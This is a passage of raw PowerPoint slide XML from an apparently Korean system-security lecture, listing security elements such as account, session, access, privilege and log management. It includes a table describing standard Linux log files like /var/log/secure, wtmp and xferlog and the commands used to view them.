                        <a:t>) ~ 11.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>)]</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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/Theory/T6 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>시스템 보안의 요소</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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>시스템 보안의 요소</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정과 패스워드 관리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>세션 관리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>접근제어</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>권한관리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로그관리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">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/Theory/T6 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>계정과 패스워드 관리</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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정과 패스워드 관리</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>적절한 권한을 가진 사용자를 식별하기 위한</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>가장 기본적인 인증 수단</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>신분증 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 공문서 같은 역할을 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1">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/Theory/T7 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>로그</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로그 위치</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/var/log/secure</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 - telnet, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>ssh</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접속에 대한 유저 로그인 인증 기록 </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/var/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>dmesg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부팅시</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 시스템에 의해 기록되는 로그</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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/var/log/message</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syslog</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>에 의한 로그인</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>설정</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>장치 정보의 전체적인 로그를 기록합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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/var/run/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>utmp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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>w,who,users,finger</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명령어 등으로 내용을 볼 수 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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/var/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>wtmp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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>로그인</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>로그아웃</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>시스템의 재부팅에 대한 정보가 담겨있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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바이너리 파일로 되어 있으며 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>last </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>명령어로 내용을 확인 할 수 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a: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/var/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>lastlog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계정사용자들이 마지막으로 로그인한 정보</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바이너리 파일로 되어 있으며 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>lastlog</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명령어로 확인 할 수 있다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a: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/var/log/boot.log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부팅시</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 서비스 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>데몬들의</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 실행 상태를 기록하는 로그이다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a: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/Theory/T7 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>로그</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로그 위치</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/var/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>cron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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>cron</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a: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/var/log/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>xferlog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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>FTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>서버의 데이터 전송에 관련된 로그 기록입니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>파일의 송수신모드</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(a:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>아스키파일</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, b:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>바이너리파일</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특수행위 플래그</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(C:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>압축</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, U:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>비압축</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>전송방향</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>o:out</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> going, i:ingoing), </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>로그인한 사용자의 종류</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>a:anonymous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, g:guest,r:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>패스워드인증된사용자</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
